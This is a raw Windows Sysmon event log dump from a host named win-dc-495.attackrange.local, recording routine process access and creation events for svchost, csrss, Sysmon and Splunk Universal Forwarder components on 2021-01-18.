14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.500{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:44.501{59A5CD1D-94C8-6005-4605-00000000A301}4544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:45.375{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:45.375{59A5CD1D-94C9-6005-4705-00000000A301}7104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.922{59A5CD1D-94CA-6005-4905-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:46.835{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
